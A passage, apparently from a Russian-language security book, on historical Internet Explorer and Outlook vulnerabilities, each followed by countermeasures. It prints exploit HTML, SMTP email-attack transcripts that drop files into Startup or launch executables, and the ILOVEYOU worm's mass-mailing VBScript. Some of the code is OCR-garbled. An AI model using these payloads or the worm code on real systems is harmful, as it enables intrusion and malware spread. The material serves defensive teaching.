    Описываемая реализация представляет собой замечательный пример. В исходном файле дескриптор I FRAME служит для задания локального файла. Затем в I FRAME вставляется код JavaScript, который выполняется в домене файловой системы. Если нечестный оператор Web-узла знает имя файла (или может о нем догадаться) и его местоположение, то при желании он сможет просмотреть файл любого типа, который может быть открыт в окне броузера. Например, файл winnt\repair\sam._ таким способом прочитать не удастся, поскольку при этом на экран будет выведено диалоговое окно загрузки файла IE. Георгий представил пример кода, который считывает файл C:\test.txt (при условии, что он существует на диске пользователя).

    Контрмеры



    Установите модуль обновления, который можно найти по адресу http://www. microsoft.com/technet/security/bulletin/ms99-042.asp. Можно также отключить режим использования активных сценариев с помощью процедуры, описанной в разделе "Разумное Использование Зон Безопасности: Общее Решение Проблемы Элементов ActiveX".

    Проверка принадлежности к доменам Internet Explorer



    В июне 2000 года Эндрю Носенко (Andrew Nosenko) из компании Mead & Company сообщил о том, что в Internet Explorer две функции не выполняют надлежащую проверку принадлежности к домену. Это позволяет создать такую страницу HTML, которая открывала бы фрейм с локальным файлом и могла читать этот файл . В стремлении быть непревзойденным, Георгий Гунински тоже поместил на своем узле сообщение о подобной уязвимости. Код Георгия поражает обманчивой простотой.

    <IFRAME ID="I1"X/IFRAME>
    <SCRIPT for=Ii event="
    NavigateComplete2(b)">
    alert("Here is your file:
    \n"+b.document.body.innerText);
    </SCRIPT>
    <SCRIPT>
    II.navigate ( "file://c:/test.txt");
    setTimeout('II.navigate
    ("file://c:/test.txt";',1000);
    </SCRIPT>

    Как и в предыдущем случае, в качестве цели был избран файл test. Но с таким же успехом можно считать любой другой файл системы пользователя, который можно просмотреть в броузере. Для этого нужно внести соответствующие изменения в строку file://с:/test.txt.

    Контрмеры



    Примените модуль обновления, который можно найти по адресу http://www. microsoft.com/technet/security/bulletin/fq00-033.asp. Как и в предыдущих случаях, альтернативной мерой является отключение активных сценариев. Эта предосторожность значительно ограничит функциональные возможности Web-узлов, работа которых основана на применении сценариев (см. раздел, посвященный зонам безопасности).


    6. Обман SSL



    Обман SSL


    SSL — это протокол, используемый в настоящее время в большинстве транзакций, связанных с электронной коммерцией в Internet. В протоколе SSL реализован алгоритм шифрования по открытому ключу, который может отпугивать неискушенных пользователей, однако является важным понятием для того, кто занимается финансовыми операциями в современной экономике. 
    SSL является также спецификацией по обеспечению безопасности, и в этом качестве этот протокол используется разработчиками программных продуктов. Как уже упоминалось в предыдущих разделах, практическая реализация любой, даже самой надежной концепции, может оказаться неудачной и свести к нулю уровень безопасности, обеспечиваемый любой спецификацией. Именно такая реализация и будет рассмотрена в следующем разделе.
    Но перед этим хотелось бы дать один небольшой совет: следует применять наиболее надежные алгоритмы шифрования SSL, доступные для Web-броузеров, т.е. со 128-разрядным ключом. Благодаря послаблению экспортных законов США теперь 128-разрядные версии программ Netscape и Internet Explorer доступны каждому. Исключение составляют лишь страны, внесенные в список эмбарго. В IE выберите команду About и посмотрите, как получить 128-разрядную версию. 

    Обход проверки сертификата SSL в Web-броузере



    В этом разделе вы узнаете о том, как можно ввести в заблуждение службу проверки подлинности сертификата SSL Web-узла, который был бы признан недействительным при обычной перекрестной проверке подлинности сертификата на основе сопоставления имени DNS и IP-адреса сервера на другом конце соединения. Такая проверка должна проводиться в соответствии со спецификацией SSL. Однако группа из Словении ACROS Security Team обнаружила изъян в Netscape Communicator до версии 4.73. После
    того как сеанс связи SSL уже установлен, Communicator этих версий сравнивает в сертификате SSL последующих сеансов только IP-адреса, но не имена DNS. Броузер можно обмануть, открыв сначала сеанс связи SSL с каким-нибудь специально настроенным сервером, маскирующимся под легальный. При этом все последующие соединения SSL с легальными Web-серверами будут замыкаться на "жульническом" сервере, а пользователь не получит об этом ни одного стандартного предупреждения.
    Конечно же, авторы осознают, что подобное изложение похоже, скорее, на головоломку. Более последовательное объяснение можно найти в первоначальном сообщении команды ACROS, опубликованном в мае 2000 года в информационном бюллетене CERT (Computer Emergency Response Team). Несмотря на то что IP-адреса, используемые в приведенном примере, уже устарели, стоит попытаться понять суть этого изъяна. Для большинства пользователей само собой разумеется, что как только маленькая пиктограмма в виде замочка появилась в окне броузера, можно ни о чем не беспокоиться. Как продемонстрировала группа ACROS, пока разработкой программного обеспечения занимаются простые смертные, расслабляться нельзя ни в коем случае.
    Подобный изъян был обнаружен группой ACROS и в броузере Internet Explorer. Но проблема Internet Explorer состоит в том, что он проверяет только факт выдачи сертификата организацией, обладающей соответствующими полномочиями, не утруждая себя проверкой имени сервера и сроком годности сертификата. Это происходит лишь тогда, когда сеанс соединения SSL с сервером SSL устанавливается через фрейм или изображение (это коварный способ установления соединения SSL, которых пользователь может и не заметить). В Internet Explorer не проводится и повторная проверка подлинности сертификата, если во время того же сеанса работы программы устанавливается повторный сеанс связи SSL с одним и тем же сервером.

    Контрмеры против обхода проверки сертификатов SSL



    Как упоминалось выше, обновление программы Communicator до версии 4.73 или выше позволит устранить описанную проблему. Тем, кто занимается разработкой различных дополнений к предыдущим версиям, компания Netscape предоставляет диспетчер PSM (Personal Security Manager). Эта программа выполняет шифрование по открытому ключу (подобно тому, которое используется в протоколе SSL) вместо Netscape Communicator 4.7 или других приложений. 
    Конечно, подлинность сертификата безопасности узла можно проверить только одним способом. Для этого нужно самостоятельно просмотреть его в окне броузера. И в Netscape, и в Internet Explorer это можно осуществить,



    Рис. 16.4. Проверка сертификата SSL в броузере Internet Explorer. Убедитесь в том, что эта информация совпадает с той, которую вы ожидали увидеть

    щелкнув на маленькой пиктограмме с изображением замочка, расположенной в нижней части окна броузера. Эту же информацию можно получить, щелкнув на кнопке Security панели инструментов Netscape. В Internet Explorer для просмотра анапогичной информации следует сделать щелчок на пиктограмме с набольшим замочком или выбрать команду File=>Properties во время посещения страницы, защищенной протоколом SSL. На рис. 16.4 показан сертификат одного из популярных Web-узлов.
    В IE существует два параметра, которые позволяют автоматически проверять, не отменен ли сертификат SSL. К ним относятся Check For Server Certificate Revocation и Check For Publisher Certificate Revocation. Для того чтобы получить доступ к этим правилам обеспечения безопасности, выберите команду Tools>lnternet Options, перейдите во вкладку Advanced и просмотрите группу параметров Security.


    8.gif

    Изображение: 

    7. Уязвимость почтовых приложений



    Уязвимость почтовых приложений


    Представление большинства людей об Internet связано с наиболее заметной его частью, т.е. с World Wide Web. Однако объем ежедневно отправляемых электронных сообщений, по-видимому, превышает трафик Web. Таким образом, электронная почта является автономным эффективным средством, входящим в набор пользователя Internet, которое помогает ему комфортно чувствовать себя в киберпространстве. Интересен тот факт, что два чрезвычайно популярных протокола Internet, HTTP и SMTP, имеют много точек соприкосновения, что чрезвычайно увеличивает потенциальную опасность. Сообщения электронной почты в формате HTML — эффективное средство направленного взлома многих броузеров. Для подобных атак можно применять многие из ранее описанных методов, а возможно, и какие-то другие. Добавьте в электронные сообщения небольшого количества мобильного кода — и процесс проникновения в системы доверчивых пользователей станет во многом похож на детскую игру.

    Хотя в этом разделе речь идет исключительно об электронной почте, ясно, что описываемые приемы можно применить и к сообщениям групп новостей Internet. Такая тактика может привести даже к еще более массовым разрушениям, чем "спэм", при котором используются данные методы.


    9. Запуск произвольного кода с помощью электронной почты



    Запуск произвольного кода с помощью электронной почты


    При описании следующих атак будут продемонстрированы различные механизмы запуска команд на целевом компьютере. Многие из них приводятся в действие при открытии коварных сообщений или их предварительном просмотре в соответствующей части окна программ Outlook и Outlook Express.

    Атаки с использованием элементов ActiveX, помеченных как "safe for scripting"



    Взломщики не могли выдумать ничего более убийственного: все, что нужно сделать жертве, — это просто прочитать сообщение (или просмотреть его в окне предварительного просмотра программ Outlook и Outlook Express, если такая возможность имеется). При этом со стороны пользователя не требуется никакого вмешательства. Эта чудовищная "простота" снова появилась благодаря элементу управления Scriptlet. typelib, помеченному как "safe for scripting" (более подробно этот вопрос обсуждается в разделе, посвященном элементам ActiveX). С такой же легкостью можно использовать Eyegod.ocx, но метод, рассматриваемый в данном разделе, основан на применении проверочного кода Георгия Гунински, в котором используется элемент управления Scriptlet. typelib. Напомним, что Георгий поместил этот код на своем Web-узле. Ниже приведена слегка модифицированная версия этого кода, вставленного в капсулу для взлома почты.

    helo somedomain.com
    mail from: <mallory@malweary.com>
    rcpt to: <hapless@victim.net>
    data
    subject: Ya gotta read this!
    MIME-Version: 1.0
    Content-Type: text/html; charset=us-ascii
    Content-Transfer-Encoding: 7bit
    If you have received this message in error, please delete it.
    <object id="scr"
    classid="clsid:06290BD5-48AA-llD2-8432-006008C3FBFC">
    </object>
    <SCRIPT>
    scr.Reset();
    scr.Path="C:\\WIN98\\start
    menu\\programs\\startup\\guninski.hta";
    scr.Doc="<object id='wsh'
    classid='clsid:F935DC22-1CFO-11DO-ADB9-
    OOC04FD58AOB'x/object><SCRIPT>alert
    {
    ' Written by Georgi Guninski
    );</" + "SCRIP
    T>";
    scr.write ();
    </SCRIPT>
    </object>
    quit

    Этот код проводит атаку в два этапа. Во-первых, он создает в папке Startup на компьютере пользователя файл приложения HTML (с расширением .НТА) и записывает в него содержимое сценария. Этот файл создается почти незаметно для пользователя, пока он просматривает сообщение (если внимательно следить за световым индикатором жесткого диска, то можно заметить его мерцание). Вот как выглядит наше тестовое сообщение в папке inbox (ниже на рисунке показано окно программы Outlook Express). Для завершения взлома достаточно отобразить сообщение в окне предварительного просмотра.


    Следующий этап произойдет, когда пользователь перезагрузит компьютер. Рано или поздно это неизбежно случится. Конечно же, можно написать такой сценарий, который сам выполнял бы перезагрузку. При этом запустится файл .НТА (данные файлы автоматически интерпретируются командной оболочкой Windows). В нашем случае пользователь получит следующее "приветственное" сообщение.


    Эти безобидные действия — одна из многих реализаций в безбрежном море возможностей. В подобной ситуации жертва полностью находится в руках взломщика.
    Действие так называемого червя КАК основано на уязвимости Scriptlet, который тоже можно использовать для охоты на доверчивых (и не пользующихся модулями обновления) пользователей Outlook и ОЕ. Более подробную информацию о "черве" КАК можно найти по адресу http://www.syiri.antec.com/avcenter/venc/data/wscript. kakworm.html.

    Контрмеры



    Примените модули обновления для компонентов ActiveX Scriptlet и Eyedog, которые можно получить по адресу http://www.microsoft.com/technet/security/ bulletin/ms99-032.asp.
    Еще раз следует напомнить, что данные модули обновления позволят устранить проблему, связанную только с данными компонентами. Более универсальной мерой является отключение в программах электронной почты возможности применения элементов управления ActiveX. Используемая для этого процедура описана в разделе, в котором рассматриваются зоны безопасности.

    "Запуск" документов MS Office с помощью элементов ActiveX



    Георгий Гунински не ограничил свои изыскания использованием дескрипторов HTML в электронном сообщении для загрузки потенциально опасных элементов управления ActiveX. В последующих информационных сообщениях, опубликованных на его узле, сообщается, что с помощью этого же метода могут быть "запущены" и потенци-ачьно опасные документы Microsoft Office ("поведение" этих документов очень похоже на поведение элементов управления ActiveX). С результатами исследований можно ознакомиться по адресу http://www.nat.bg/-joro/sheetex-desc.html (для документов Excel и PowerPoint) и http://www.nat.bg/~joro/access-desc.html (здесь описывается процедура запуска кода VBA, содержащегося в базах данных Access).
    Руководствуясь двумя соображениями, в этом разделе будет рассмотрена вторая из этих возможностей. Во-первых, вопросы, связанные с Excel и PowerPoint, более интересны ввиду способности этих приложений незаметно записывать файлы на диск, что будет обсуждаться в последующих разделах. Во-вторых, изъян, основанный на использовании Access, по мнению большинства специалистов в области обеспечения безопасности, является более серьезным, поскольку справиться с ним не помогают все те меры предосторожности, которые применяются для защиты от элементов управления ActiveX. Даже если полностью запретить их использование, система все равно остается уязвимой. Вот как высоко оценили серьезность этой проблемы специалисты института SANS: "Возможно, это одна из самых опасных ошибок, допущенных компанией Microsoft в программах для рабочих станций Windows (всего ряда — 95. 98, 2000, NT 4.0)". Грустно, что это замечание, которое на первый взгляд наполнено сенсуализмом, на самом деле может оказаться не так далеко от истины.
    Проблема заключается в том способе, который в системе Windows используется для проверки файлов Access (.MDB) при их загрузке в Internet Explorer с помощью дескриптора OBJECT, как показано в следующем фрагменте кода HTML, предоставленного Георгием Гунински. 

    OBJECT data="db3.mdb" id="dl"></OBJECT>

    Как только программа Internet Explorer встречает дескриптор объекта, загружается база данных Access, имя которой задано в параметре data=, а затем для ее открытия вызывается программа Access. Это происходит перед тем, как пользователь получит предупреждение о потенциальной опасности, которая при этом может возникнуть. Таким образом, база данных будет запущена независимо от того, настроен IE/Outlook/ОЕ для запуска элементов управления ActiveX или нет. Ну и дела!
    Пример Георгия основан на применении удаленного файла с именем db3.mdb, который он разместил на своем Web-узле. Этот файл представляет собой базу данных Access. где находится одна форма, запускающая текстовый редактор Wordpad. Вот еще одна капсула для взлома электронной почты, демонстрирующая, как можно реализовать эту атаку.

    helo some domain, corn
    mail from: <mallory@attack.net>
    rcpt to: <hapless@victim.net>
    data
    subject: And another thing!
    Importance: high
    MIME-Version: 1.0
    Content-Type: text/html; charset=us-ascii
    <HTML>
    <h2>Enticing message here!</h2>
    id="dl"x/OBJECT>
    </HTML>
    quit

    В этом примере явно задан URL файла db3.mdb (строка 12), чтобы можно было использовать его в сообщении электронной почты. Институтом SANS было выдвинуто требование, чтобы при доступе и совместном использовании файлов Access через Internet применялся протокол SMB. Просто поразительно, сколько FTP-серверов предоставляет свои ресурсы для бесконтрольного размещения данных и доступа к ним. В следующих разделах указаны другие места хранения данных, которые могут заинтересовать взломщиков.
    Основной особенностью атак этого типа является то, что обработка этих простых дескрипторов программами IE/Outlook/ОЕ приводит к запуску файлов, в которых содержится мощный макрос VBA. При этом не требуется какого-либо вмешательства пользователя. Неужели такая перспектива еще никого не встревожила?

    Контрмеры: задание пароля администратора Ассеss



    Запрещение использования элементов управления ActiveX не предотвратит возможности реализации описанных атак. Поэтому нужно применить модуль обновления в соответствии с инструкциями, приведенными по адресу http://www.microsoft.com/-technet/security/bulletin/MS00-049.asp. Особое внимание следует обратить на модуль обновления, предназначенный специально для устранения проблемы, связанной с Access (компания Microsoft назвала ее изъяном "сценария IE" ("IE Script")).
    Компания Microsoft рекомендует также воспользоваться следующим средством, которое будет полезно независимо от того, был ли установлен модуль обновления. Для программы Access нужно установить пароль администратора (по умолчанию он не используется). Выполните для этого следующие действия.
    1. Запустите Access 2000, но не открывайте никаких баз данных.
    2. Выберите команду Tools>Security.
    3. Выберите пункт User And Group Accounts.
    4. Выберите пользователя Admin, который должен существовать по умолчанию.
    5. Перейдите во вкладку Change Logon Password.
    6. Если до этого не были внесены никакие изменения, пароль администратора должен быть пустым.
    7. Введите пароль администратора.
    8. Для выхода щелкните на кнопке ОК.
    Это должно предотвратить возможность запуска злонамеренного кода VBA и его работы с высокими привилегиями. Специалисты SANS также отметили, что блокирование брандмауэром исходящих запросов на совместное использование файлов Windows (порты TCP 139 и TCP 445) позволит уменьшить вероятность необдуманного запуска пользователями удаленного кода.

    Запуск файлов с помощью ненулевого параметра CLSID элементов ActiveX



    Причиной выявления данного изъяна послужило вскользь сделанное замечание в дискуссии, которая велась в бюллетене Bugtraq по поводу уязвимости, обусловленной "навязыванием" файла вложения (см. ниже), которую предложили реализовать на узле malware. com. Велд Понд (Weld Pond), высококлассный хакер из группы LOpht, прославившийся благодаря утилите netcat для NT (см. главу 5), завел со своим коллегой Oil Dog из группы "Cult of Dead Cow", знаменитым автором программы Back Orifice 2000 (см. главы 4 и 14), разговор о механизме запуска файлов, навязанных пользователям по методике malware.com. Оказывается, можно запустить любой файл, поместив в тело электронного сообщения дескриптор OBJECT и сконфигурировав его с помощью ненулевого параметра CLSID. При этом в мишень превращается каждый исполняемый файл, находящийся на диске пользователя. Ниже приведен пример соответствующей капсулы для взлома электронной почты.

    helo somedomain.com
    mail from: <mallory@attack.net>
    rcpt to: <hapless@victim.net>
    data
    subject: Read this!
    Importance: high
    MIME-Version: 1.0
    Content-Type: text/html; charset=us-ascii
    <HTML>
    <HEAD>
    </HEAD>
    <BODY>
    <OBJECT CLASSID='CLSID:
    10000000-0000-0000-0000-000000000000'
    CODEBASE='с:\windows\calc.exe'X/OBJECT>
    </BODYX/HTML>
    quit

    Обратите внимание на ненулевой параметр CLSID. Именно он приводит в действие весь механизм. Файл, который будет запущен, задается параметром CODEBASE.
    Однако в процессе тестирования выяснилось, что для того, чтобы этот способ успешно сработал, требуется удачное расположение планет. Первое необходимое условие заключается в том, что нужно, чтобы в программе Outlook Express 5.00.2615.200 для зоны был установлен уровень безопасности Low. Кроме того, при попытке запуска файла calc.exe из папки System появлялось диалоговое окно с предупреждением о неподписанном элементе управления. Для такого стечения обстоятельств пользователи должны быть достаточно безграмотны. Но если проделать это все же удастся, то появляются заманчивые перспективы, особенно при использовании этого способа совместно с возможностью записи файлов на диск, предложенной на Web-yxie malware. com.

    Контрмеры против использования ненулевого параметра CLSID



    Основываясь на результатах тестирования, авторы утверждают, что установка соответствующего уровня безопасности зоны позволит устранить эту проблему (см. в предыдущих разделах описание зон безопасности).

    Переполнение буфера поля даты в программах Outlook и Outlook Express



    Возможно, кому-то из читателей показалось, что стержнем большинства типов атак являются элементы управления ActiveX. 18 июля 2000 года в бюллетене Bugtraq  появилось сообщение об изъяне программ Outlook и Outlook Express совсем другого типа, не имеющем ничего общего с элементами ActiveX.
    Проблема заключается в классическом переполнении буфера, причиной которого может послужить заполнение раздела GMT (Greenwich Mean Time — среднее время по Гринвичу) поля даты заголовка электронного сообщения чрезмерно большой порцией данных. В процессе загрузки такого сообщения через протоколы РОРЗ или IMAP4 файл INCETCOMM.DLL, который отвечает за анализ значения GMT, не выполняет необходимой проверки переполнения границ. Это приводит к возникновению аварийной ситуации в программах Outlook и Outlook Express и возможности запуска произвольного кода. Ниже приведен пример кода, работа которого основана на наличии этого изъяна.

    Date: Tue, 18 July 2000 14:16:06 +<около 1000 байтхкод для запуска>

    В этой книге уже неоднократно упоминалось, что возможность запуска в системе произвольного кода открывает неограниченные возможности. Коварное сообщение позволяет незаметно установить программу типа "троянский конь". Через него могут распространяться "черви", а, кроме того, оно может дискредитировать целевую систему, запускать вложения — одним словом, делать практически все, что заблагорассудится.
    Пользователям Outlook Express достаточно лишь открыть папку с представляющим опасность сообщением, и они сразу же становятся уязвимыми. Простая загрузка такого сообщения в процессе проверки почты может привести к переполнению буфера и возникновению исключительной ситуации. Таким образом, пользователи ОЕ попадают в замкнутый круг: сообщение не может нормально загрузиться, а его содержимое приводит к аварии программы при каждой последующей попытке восстановить почтовую программу. Одним из способов устранения описанной проблемы является просмотр почты и удаление вызвавшего аварию сообщения (при условии, что мы можем его "вычислить") с помощью почтового клиента, отличного от Outlook/OE. Это легко сделать, используя программу Netscape Messenger, в окне предварительного просмотра которой отображается дата сообщения, по которой можно понять, какое из сообщений привело к сбою. Пользователи Outlook уязвимы во время предварительного просмотра, чтения и пересылки сообщения, вызывающего неполадки, а также тогда, когда они на него отвечают.
    Первоначально код, основанный на данном изъяне, был опубликован в бюллетене Bugtraq. Однако позже выяснилось, что данный подход можно применять лишь против сервера, входящего в состав частной локальной сети. Поэтому он неприменим, если его использовать портив пользователя, подсоединенного к Internet через модем. Как представляется, эта публикация стала результатом ошибки Аарона Дрю (Aaron Drew), который, по-видимому, пытался применить подход, подобный описанному в этой главе методу капсулы для взлома электронной почты, но вместо этого ошибочно отправил свое сообщение в бюллетень Bugtraq. Подготовленное для официального оглашения, это сообщение выглядело бы следующим образом (обратите внимание на строку Date, в которой для краткости опущены данные, вызывающие переполнение; в примере они заключены в квадратные скобки, которые не являются необходимыми).

    helo somedomain.com
    mail from: <mallory@attack.net>
    rcpt to: <hapless@victim.net>
    data
    Date: Sun, 7 May 2000 11:20:46
    +[~1000 байт + код в шестнадцатеричном формате или ascii]
    Subject: Date overflow!
    Importance: high MIME-Version:
    1.0 'Content-Type: text/plain;
    charset=us-ascii
    This is a test of the Outlook/OE date field overflow,
    quit

    Группа Underground Security Systems Research (USSR, http://www.ussrback.com) также сообщила о том, что обнаружила эту брешь (по крайней мере, об этом заявил хакер Метатрон (Metatron)). Однако, по их утверждению, они не стали сообщать о ней публично, ожидая, пока Microsoft выпустит соответствующий модуль обновления. На базе этого изъяна группа USSR опубликовала свою реализацию, что вызвало интерес к их Web-узлу. Код запускается почти таким же образом, как и в предыдущем примере.

    Контрмеры против переполнения поля даты



    Согласно информационному сообщению компании Microsoft, которое можно найти на ее Web-узле по адресу http://www.microsoft.com/technet/
    security/bulletin/ MS00-043.asp
    , изъян может быть устранен с помощью модуля обновления, находящегося по адресу http://www.microsoft.com/windows/
    ie/download/critical/patch9.htm
    .
    Кроме того, эту проблему можно решить, установив одно из следующих обновлений с параметрами, принятыми по умолчанию.

    •  Internet Explorer 5.01 Service Pack 1.
    •  Internet Explorer 5.5 на любую систему за исключением Windows 2000.

    Если выполняется установка, отличная от установки по умолчанию, и во время этого процесса устанавливаются обновленные компоненты Outlook Express, то эта уязвимость также устраняется (при этом у пользователя будет возможность соответствующего выбора).
    При установке на компьютер с операционной системой Windows 2000 IE 5.5 не устанавливает обновленные компоненты Outlook Express, поэтому этот изъян не устраняется.
    Следует также заметить, что по утверждению компании Microsoft пользователи Outlook, у которых эта программа настроена только для использования служб MAPI, не подвержены негативному влиянию, независимо от установленной у них версии Internet Explorer. Если службы электронной почты Internet не установлены (Tools>Services), то библиотека INETCOMM.DLL не используется.


    9.gif

    Изображение: 

    10.gif

    Изображение: 

    10. "Черви", распространяющиеся через адресную книгу Outlook



    "Черви", распространяющиеся через адресную книгу Outlook


    В течение нескольких последних лет XX века мошенники, избравшие своим инструментом компьютерные коды, организовывали за счет пользователей программ Outlook и Outlook Express буйную новогоднюю "вечеринку". Ими было выпущено целое полчище вирусов-червей, размножающихся по изящной технологии: осуществляя самостоятельно рассылку по каждому адресу, найденному в адресной книге жертвы, эти вирусы маскировались под сообщения, присланные из надежного источника. Это оригинальное применение методов соииа1ьной инженерии (см. главу 14) было ударом, который злой гений-изобретатель наносил наверняка. Корпорации, в которых работали десятки тысяч служащих, активно использующих Outlook, были вынуждены отказаться от применения почтовых служб, чтобы остановить поток сообщений, снующих туда-сюда от одного пользователя к другому, засоряя почтовые ящики и забивая до отказа дисковое пространство почтовых серверов. Согласитесь, тяжело удержаться от того> чтобы не открыть вложение, пришедшее от знакомого, которому вы доверяете.
    Первая такая "ракета" подобного рода называлась Melissa. Хотя ее предполагаемый автор Девид Л. Смит (David L. Smith) был пойман и в конце концов признан виновным в нанесении ущерба второй степени, за которое по закону положен тюремный срок от пяти до десяти лет и штраф в размере до $150000, люди по-прежнему продолжали заниматься подобными экспериментами. Вирусы с такими привычными названиями, как Worm.Explore.Zip, BubbleBoy и ILOVEYOU появлялись один за другим, пока примерно к концу 2000 года не стало казаться, что даже средства массовой информации устали от всех этих сенсаций. Однако этот процесс все еше продолжается и поэтому заслуживает отдельного упоминания.

    "Червь" ILOVEYOU



    Ниже приведена подпрограмма "червя" ILOVEYOU. написанная на языке VBScript. которая обеспечивает его распространение через электронную почту (некоторые строки были разделены вручную, чтобы уместить их на странице).

    sub spreadtoemail()
    On Error
    Resume Next
    dim x,a, ctrlists,ctrentries,malead,b,regedit,regv,regad
    set regedit=CreateObject("
    WScript.Shell")
    set cue"WScript.
    CreateObject("Outlook.Application"!
    set ir,api=out.GetNameSpace ("MAPI")
    for ctrlists-1 to mapi.
    AddressLists.Count
    set a-rnapi.
    Address Lists (ctrlists)
    x=l
    regv=regedit.RegRead
    ("HKEY_CURRENT_USER\Software\Microsoft\WAB\"Sa)
    if (regv-"") then
    regv=l
    end i':
    it (j.r.1.; a . AddressEntries .Count! >int (regvi 5 ther.
    for cr.rer_tries=l. to a.
    AddressEntries .Count
    malead-a.AddressEntries(x)
    regad=~""
    regad=--rsgedit - RegP.ead
    ("HKEY_CURRENT_USER\Software\Microsof t\WAB\"4malead)
    if (rec-ad-""; then
    set i:iale=out.C;:eateltem(0)
    male.Recipients.Add(malead)
    male.Subject = "ILOVEYOU"
    male.body = vbcrlf&"kindly check the attached
    LOYELETTER coming from me."
    male.Attachments.Add(dirsystems"
    \LOVE-LETTER-FOR-YOU.TXT.vbs")
    male.Send
    regedit.RegWrite "HKEY_CURRENT_USER\Software
    \Microsoft\WAB\"&malead,1,"
    REG_DWORD"
    end if
    x=x+l
    next
    regedit.RegWrite
    "HKEY CURPSMT USER\Software\Microsoft\WAB\
    "&a,a.AddressEntries.Count else
    regedit.RegWrite
    "EKEY C'JRRENT_USER\Software\Microsoft\WAB\"
    &a,a.AddressEntries.Count
    end if
    next
    Set out--Ncthing Set n\api=Nothing
    end sub

    Эта простая программа длиной в 37 строк обращается к интерфейсу MAPI, чтобы отыскать местоположение адресной книги Windows (WAB — Windows Address Book) в системном реестре. Затем она создает новое почтовое послание с темой I LOVE YOU и телом kindly check the attached LOVELETTER coming from me ("будьте так любезны, прочтите вложенное любовное письмо, пришедшее вместе с данным сообщением"), которое рассылается каждому найденному адресату. Если кто-нибудь из далеких от программирования читателей думает, что речь здесь идет о какой-нибудь сложной науке, то будет уместно напомнить, что принцип работы вируса ILOVEYOU основан на дипломной работе, написанной 23-летним студентом. Кто знает, какой еще ущерб мог бы быть нанесен?

    Как остановить "червей", распространяющихся через адресную книгу



    После нескольких лет критики в средствах массовой информации компания Microsoft устала обвинять пользователей в том, что они сами запускают вложения электронной почты, в которых содержатся вирусы-"черви", и выпустила соответствующий модуль обновления. Он называется Outlook 2000 SR-1 E-mail Security Update и Outlook 98 E-mail Security Update (http://officeupdate.microsoft.com/2000/downloadDetails/Out2ksec.hem и Out98sec .htm соответственно). Одной из особенностей этого модуля является наличие в нем механизма защиты модели объектов (Object Model Guard), который был разработан .для предупреждения пользователей о том, что внешней программой предпринята попытка получения доступа к их адресной книге Outlook или отправки сообщений от их имени. Компания Reliable Software Technologies Corporation (RSTCorp) выпустила дополнительную утилиту, предотвращающую обращения к Outlook определенного типа, поступающие от компонента Virtual Basic Scripting Engine. Таким образом можно предотвратить распространение вирусов, подобных 1EOVEYOU. Эту дополняющую программу, которая называется JustBeFriends.dll (JBF), можно использовать совместно с модулем обновления программы Outlook, который предлагается компанией Microsoft. В отличие от механизма OMG компании Microsoft, который контролирует доступ к функциям Outlook внутри самой программы, JBF контролирует возможность доступа к Outlook или Outlook Express со стороны других приложений. Если попытка доступа осуществляется с помощью сценария, запушенного с рабочего стола или из вложения, то утилита JBF предотвращает эту попытку. В противном случае пользователь должен подтвердить, что данному приложению разрешен доступ к Outlook. 
    Специалисты компании RSTCorp утверждают, что их подход более надежный, чем тот, которым воспользовалась компания Microsoft при разработке модели OMG, поскольку во втором случае необходимо обеспечить защиту огромного количества объектов, что является трудной задачей. Они также отмечают, что адреса электронной почты могут быть выявлены не только в адресной книге, но и в цифровых подписях. в теле сообщения или других документах, а также в некоторых других местах, которые могут быть обнаружены. Ограничив доступ к Outlook/OE со стороны сценариев, утилита JBF теоретически может предотвратить новые атаки, основанные на использовании широкого диапазона аналогичных приемов.
    Программу JustBeFriends можно найти на узле http://www.rstcorp.com/jbf. Хотелось бы, чтобы каждый ее файл был упакован отдельно вместо того, чтобы быть упрятанным в единственный архив (в основном для большей степени доверия). Несмотря на это, авторы рекомендуют воспользоваться этой программой всем пользователям, у которых программа Outlook/OE установлена на платформе NT/2000.
    Программа JustBeFriends не работает на платформе Win 9x.


    11. Атаки с использованием вложений



    Атаки с использованием вложений


    Одной из наиболее удобных особенностей электронной почты является возможность вставки в сообщения файлов. Однако это удобство, позволяющее сэкономить время, имеет и очевидные отрицательные стороны, а именно: у пользователей появляется непреодолимая тяга запустить чуть ли не каждый файл, полученный по электронной почте. Кажется, никому не нужно напоминать, что это равносильно приглашению к себе в гостиную плохих парней.
    В последующих разделах обсуждаются многие виды атак, основанных на использовании файлов, вставленных в электронные сообщения. Существует ряд механизмов, позволяющих замаскировать истинные цели файла-вложения или придать ему притягательную форму, при которой палец жертвы сам тянется к кнопке мыши. Некоторые из описанных видов атак являются намного более коварными, когда вложенный файл записывается на диск без какого бы то ни было участия со стороны пользователя и его уведомления. Большинство пользователей Internet понимают, что с вложениями электронной почты нужно обращаться крайне осторожно и с большой долей скептицизма. Авторы надеются, что следующий раздел окончательно утвердит их в этом мнении.

    Взлом с использованием в качестве вложений файлов-оболочек



    Малоизвестным секретом системы Windows является то, что у файлов с расширением . SHS их реальное расширение по умолчанию скрыто в соответствии с параметром системного реестра HKEY_CLASSES_ROOT\ShellScrap\NeverShowExt. Очевидно, что в этом не было бы ничего особенного, если бы эти файлы .SHS, также известные как объекты Shell Scrap Objects, не обладали возможностью запускать команды. Основанные на технологии Object Linking and Embedding (OLE), обсуждавшейся в разделе, посвященном элементам управления ActiveX, эти файлы являются, по существу, оболочками для других внедренных объектов. Такими объектами могут быть электронные таблицы Excel (большинство читателей знают, что их можно помещать в документы Word) или файлы другого типа. Самый простой способ создать такой файл — это поместить какой-либо файл в другое приложение, поддерживающее технологию OLE (например, Wordpad), а затем скопировать его пиктограмму в другую папку. Теперь файл, который мы вставляли, содержится в своем собственном файле-оболочке, имеет свою пиктограмму и уникальное расширение (SHS). При запуске файла SHS помещенный в него объект запускается вместе с ним. Более того, с помощью компонента Microsoft Object Packager с вложенным объектом можно связывать команды, что открывает новые возможности для тех, кто хоть немного знаком с DOS.
